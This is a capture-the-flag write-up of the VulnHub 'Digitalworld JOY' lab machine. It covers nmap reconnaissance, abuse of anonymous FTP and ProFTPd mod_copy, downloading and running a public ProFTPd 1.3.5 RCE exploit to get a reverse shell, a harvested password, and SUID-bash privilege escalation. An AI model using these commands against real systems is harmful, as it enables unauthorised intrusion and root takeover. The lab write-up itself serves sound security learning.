Digitalworld JOY ~ VulnHub

The Bitz are 2 Sticky~!

Digitalworld JOY ~ VulnHub

Prerequisite

Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.

echo "192.168.72.130	joy.vhub" >> /etc/hosts
hosts file entry

Okay now onto the hacking!


Reconnaissance

As always, I started off with an NMAP scan against the machine.

β”Œβ”€β”€(rootπŸ’€nee)-[~/boxes/vulnhub/digitalworldJOY]
└─# nmap -Pn -sV -sC -oN initial joy.vhub 
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-25 04:34 EST
Nmap scan report for joy.vhub (192.168.72.133)
Host is up (0.000046s latency).
Not shown: 988 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
|_drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2016-07-19 20:03  ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: CAPA UIDL SASL AUTH-RESP-CODE PIPELINING RESP-CODES TOP STLS
|_ssl-date: TLS randomness does not represent time
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: more IDLE ENABLE LOGINDISABLEDA0001 STARTTLS capabilities listed LITERAL+ post-login SASL-IR have ID Pre-login OK LOGIN-REFERRALS IMAP4rev1
|_ssl-date: TLS randomness does not represent time
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imaps?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3s?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:04:EF:C6 (VMware)
Service Info: Hosts: The,  JOY.localdomain, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: joy
|   NetBIOS computer name: JOY\x00
|   Domain name: \x00
|   FQDN: joy
|_  System time: 2021-02-25T17:34:41+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-02-25T09:34:41
|_  start_date: N/A

Scanning & Enumeration

Based on the scan that was run, I realized that port 21 was running a FTP server and allowed anonymous users to connect and interact.

I then executed the following command to dump the whole anon root to my local system:

wget -m ftp://anonymous:[email protected]

In the downloaded directory was a text file which revealed the directory listing of the user patrick. In there was an interesting file named version_control

I then used the unsecured FTP server to copy this file from the user patrick's home directory to the anon root's ftp directory. By this way I could view it locally without having access to the machine.

site cpft <from>
site cpto <to>
version_control

This file revealed that the machine was running ProFTPd: 1.3.5. After digging the net for awhile, I found this RCE exploit on github for this particular version of ProFTPd.

Exploitation

β”Œβ”€β”€(rootπŸ’€nee)-[~/boxes/vulnhub/digitalworldJOY]
└─# wget https://raw.githubusercontent.com/thegingerninja/ProFTPd_1_3_5_mod_copy_exploit/master/exploit_proftd_1_3_5.py

β”Œβ”€β”€(rootπŸ’€nee)-[~/boxes/vulnhub/digitalworldJOY]
└─# ./exploit_proftd_1_3_5.py <target IP> <Target web dir> <Local IP> <Local Port>

I then caught the incoming shell with a netcat listener.

Lateral Movement

I then ran linpeas.sh as always which revealed an interesting file in the web directory.

Accessing this file gave me access to user patrick's credentials but not root.

patrick:apollo098765

Privilege Escalation

I first ran sudo -l to check for any binaries that the user patrick was authorized to run as root.

This revealed that patrick could run this one binary test with sudo perms.

The binary seemed to be some sort of application which can be used to change perms of files. My theory was to set sticky [SUID] bit on the bash binary and exploit the -p option that bash had. Read More

I then ran the application and when prompted for the file name in "this directory", I specified ../../../../../bin/bash. This would ensure that I climb out of "this directory"

Lastly, I ran /bin/bash -p and gained root access to the machine~!

ROOTY!